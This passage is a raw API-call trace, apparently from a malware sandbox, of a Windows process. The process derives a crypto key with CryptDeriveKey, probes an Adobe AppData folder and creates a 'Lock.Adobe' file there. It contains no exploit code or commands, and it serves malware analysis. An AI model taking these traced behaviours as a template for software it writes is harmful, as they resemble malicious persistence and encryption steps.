wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.692] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.692] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa288, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0113.692] CryptHashData (hHash=0x9a4440, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0113.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.692] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.692] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.692] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.692] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa348, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0113.693] CryptDeriveKey (in: hProv=0x9be9a0, Algid=0x6601, hBaseData=0x9a4440, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4980) returned 1 [0113.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.693] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.693] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0113.693] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.693] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0113.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0113.693] CryptDestroyHash (hHash=0x9a4440) returned 1 [0113.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.694] GetLastError () returned 0x5 [0113.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0113.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0113.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0113.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0113.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0113.695] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0113.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x37c0048 [0113.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0113.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.adobe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0113.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0113.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0113.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0113.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0113.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0113.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.698] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.698] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0113.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0113.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0113.699] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0113.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0113.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0113.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fa0 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0113.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0113.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0113.700] HeapFree (in: hHeap=0x2af0000, 